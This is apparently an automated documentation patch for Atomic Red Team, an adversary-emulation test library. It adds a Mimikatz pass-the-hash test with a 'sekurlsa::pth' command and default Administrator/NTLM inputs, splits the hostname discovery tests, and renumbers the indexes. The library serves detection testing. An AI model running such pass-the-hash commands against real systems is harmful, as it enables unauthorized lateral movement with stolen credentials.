From 0954cf3e578d0edb73046bb33e7134ff5054ac35 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 25 Nov 2019 17:06:20 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/T1075/T1075.md   | 30 ++++++++++++++++++++++++++++--
 atomics/T1082/T1082.md   | 30 ++++++++++++++++++++++++------
 atomics/index.md         |  8 +++++---
 atomics/index.yaml       | 39 +++++++++++++++++++++++++++++++++++++--
 atomics/linux-index.md   |  2 +-
 atomics/macos-index.md   |  2 +-
 atomics/windows-index.md |  7 ++++---
 7 files changed, 100 insertions(+), 18 deletions(-)

diff --git a/atomics/T1075/T1075.md b/atomics/T1075/T1075.md
index f9f1cf91..7055a261 100644
--- a/atomics/T1075/T1075.md
+++ b/atomics/T1075/T1075.md
@@ -6,12 +6,38 @@ Windows 7 and higher with KB2871997 require valid domain user credentials or RID
 
 ## Atomic Tests
 
-- [Atomic Test #1 - crackmapexec Pass the Hash](#atomic-test-1---crackmapexec-pass-the-hash)
+- [Atomic Test #1 - Mimikatz Pass the Hash](#atomic-test-1---mimikatz-pass-the-hash)
+
+- [Atomic Test #2 - crackmapexec Pass the Hash](#atomic-test-2---crackmapexec-pass-the-hash)
 
 
 <br/>
 
-## Atomic Test #1 - crackmapexec Pass the Hash
+## Atomic Test #1 - Mimikatz Pass the Hash
+Note: must dump hashes first
+[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| user_name | username | string | Administrator|
+| domain | domain | string | atomic.local|
+| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a|
+
+#### Run it with `command_prompt`! 
+```
+mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
+```
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - crackmapexec Pass the Hash
 command execute with crackmapexec
 
 **Supported Platforms:** Windows
diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md
index 824cfe01..04a5650e 100644
--- a/atomics/T1082/T1082.md
+++ b/atomics/T1082/T1082.md
@@ -34,9 +34,11 @@ In Azure, the API request <code>GET https://management.azure.com/subscriptions/{
 
 - [Atomic Test #5 - Linux VM Check via Kernel Modules](#atomic-test-5---linux-vm-check-via-kernel-modules)
 
-- [Atomic Test #6 - Hostname Discovery](#atomic-test-6---hostname-discovery)
+- [Atomic Test #6 - Hostname Discovery (Windows)](#atomic-test-6---hostname-discovery-windows)
 
-- [Atomic Test #7 - Windows MachineGUID Discovery](#atomic-test-7---windows-machineguid-discovery)
+- [Atomic Test #7 - Hostname Discovery](#atomic-test-7---hostname-discovery)
+
+- [Atomic Test #8 - Windows MachineGUID Discovery](#atomic-test-8---windows-machineguid-discovery)
 
 
 <br/>
@@ -139,10 +141,26 @@ sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
 <br/>
 <br/>
 
-## Atomic Test #6 - Hostname Discovery
-Identify system hostname for Windows, Linux, and macOS systems.
+## Atomic Test #6 - Hostname Discovery (Windows)
+Identify system hostname for Windows.
 
-**Supported Platforms:** Windows, Linux, macOS
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`! 
+```
+hostname
+```
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - Hostname Discovery
+Identify system hostname for Linux and macOS systems.
+
+**Supported Platforms:** Linux, macOS
 
 
 #### Run it with `bash`! 
@@ -155,7 +173,7 @@ hostname
 <br/>
 <br/>
 
-## Atomic Test #7 - Windows MachineGUID Discovery
+## Atomic Test #8 - Windows MachineGUID Discovery
 Identify the Windows MachineGUID value for a system.
 
 **Supported Platforms:** Windows
diff --git a/atomics/index.md b/atomics/index.md
index bb0ca6ef..46cceadd 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -601,8 +601,9 @@
   - Atomic Test #3: List OS Information [linux, macos]
   - Atomic Test #4: Linux VM Check via Hardware [linux]
   - Atomic Test #5: Linux VM Check via Kernel Modules [linux]
-  - Atomic Test #6: Hostname Discovery [windows, linux, macos]
-  - Atomic Test #7: Windows MachineGUID Discovery [windows]
+  - Atomic Test #6: Hostname Discovery (Windows) [windows]
+  - Atomic Test #7: Hostname Discovery [linux, macos]
+  - Atomic Test #8: Windows MachineGUID Discovery [windows]
 - [T1016 System Network Configuration Discovery](./T1016/T1016.md)
   - Atomic Test #1: System Network Configuration Discovery [windows]
   - Atomic Test #2: List Windows Firewall Rules [windows]
@@ -814,7 +815,8 @@
   - Atomic Test #3: Scheduled Task Startup Script [windows]
   - Atomic Test #4: Logon Scripts - Mac [macos]
 - [T1075 Pass the Hash](./T1075/T1075.md)
-  - Atomic Test #1: crackmapexec Pass the Hash [windows]
+  - Atomic Test #1: Mimikatz Pass the Hash [windows]
+  - Atomic Test #2: crackmapexec Pass the Hash [windows]
 - [T1097 Pass the Ticket](./T1097/T1097.md)
   - Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
 - [T1076 Remote Desktop Protocol](./T1076/T1076.md)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 7e21c885..d4c5dd17 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -17312,12 +17312,23 @@ discovery:
           sudo lsmod | grep -i "xen-vbd\|xen-vnif"
           sudo lsmod | grep -i "virtio_pci\|virtio_net"
           sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
-    - name: Hostname Discovery
-      description: 'Identify system hostname for Windows, Linux, and macOS systems.
+    - name: Hostname Discovery (Windows)
+      description: 'Identify system hostname for Windows.
 
 '
       supported_platforms:
       - windows
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: 'hostname
+
+'
+    - name: Hostname Discovery
+      description: 'Identify system hostname for Linux and macOS systems.
+
+'
+      supported_platforms:
       - linux
       - macos
       executor:
@@ -23303,6 +23314,30 @@ lateral-movement:
       modified: '2019-07-18T16:56:39.990Z'
       identifier: T1075
     atomic_tests:
+    - name: Mimikatz Pass the Hash
+      description: |
+        Note: must dump hashes first
+        [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
+      supported_platforms:
+      - windows
+      input_arguments:
+        user_name:
+          description: username
+          type: string
+          default: Administrator
+        domain:
+          description: domain
+          type: string
+          default: atomic.local
+        ntlm:
+          description: ntlm hash
+          type: string
+          default: cc36cf7a8514893efccd3324464tkg1a
+      executor:
+        name: command_prompt
+        command: 'mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
+
+'
     - name: crackmapexec Pass the Hash
       description: 'command execute with crackmapexec
 
diff --git a/atomics/linux-index.md b/atomics/linux-index.md
index 983df1b2..7335a0eb 100644
--- a/atomics/linux-index.md
+++ b/atomics/linux-index.md
@@ -102,7 +102,7 @@
   - Atomic Test #3: List OS Information [linux, macos]
   - Atomic Test #4: Linux VM Check via Hardware [linux]
   - Atomic Test #5: Linux VM Check via Kernel Modules [linux]
-  - Atomic Test #6: Hostname Discovery [windows, linux, macos]
+  - Atomic Test #7: Hostname Discovery [linux, macos]
 - [T1016 System Network Configuration Discovery](./T1016/T1016.md)
   - Atomic Test #3: System Network Configuration Discovery [macos, linux]
 - [T1049 System Network Connections Discovery](./T1049/T1049.md)
diff --git a/atomics/macos-index.md b/atomics/macos-index.md
index 159d4f3a..a1dd050c 100644
--- a/atomics/macos-index.md
+++ b/atomics/macos-index.md
@@ -114,7 +114,7 @@
 - [T1082 System Information Discovery](./T1082/T1082.md)
   - Atomic Test #2: System Information Discovery [linux, macos]
   - Atomic Test #3: List OS Information [linux, macos]
-  - Atomic Test #6: Hostname Discovery [windows, linux, macos]
+  - Atomic Test #7: Hostname Discovery [linux, macos]
 - [T1016 System Network Configuration Discovery](./T1016/T1016.md)
   - Atomic Test #3: System Network Configuration Discovery [macos, linux]
 - [T1049 System Network Connections Discovery](./T1049/T1049.md)
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 12463482..de04006b 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -422,8 +422,8 @@
   - Atomic Test #1: Find and Display Iinternet Explorer Browser Version [windows]
 - [T1082 System Information Discovery](./T1082/T1082.md)
   - Atomic Test #1: System Information Discovery [windows]
-  - Atomic Test #6: Hostname Discovery [windows, linux, macos]
-  - Atomic Test #7: Windows MachineGUID Discovery [windows]
+  - Atomic Test #6: Hostname Discovery (Windows) [windows]
+  - Atomic Test #8: Windows MachineGUID Discovery [windows]
 - [T1016 System Network Configuration Discovery](./T1016/T1016.md)
   - Atomic Test #1: System Network Configuration Discovery [windows]
   - Atomic Test #2: List Windows Firewall Rules [windows]
@@ -496,7 +496,8 @@
   - Atomic Test #2: Starup Folder Script [windows]
   - Atomic Test #3: Scheduled Task Startup Script [windows]
 - [T1075 Pass the Hash](./T1075/T1075.md)
-  - Atomic Test #1: crackmapexec Pass the Hash [windows]
+  - Atomic Test #1: Mimikatz Pass the Hash [windows]
+  - Atomic Test #2: crackmapexec Pass the Hash [windows]
 - [T1097 Pass the Ticket](./T1097/T1097.md)
   - Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
 - [T1076 Remote Desktop Protocol](./T1076/T1076.md)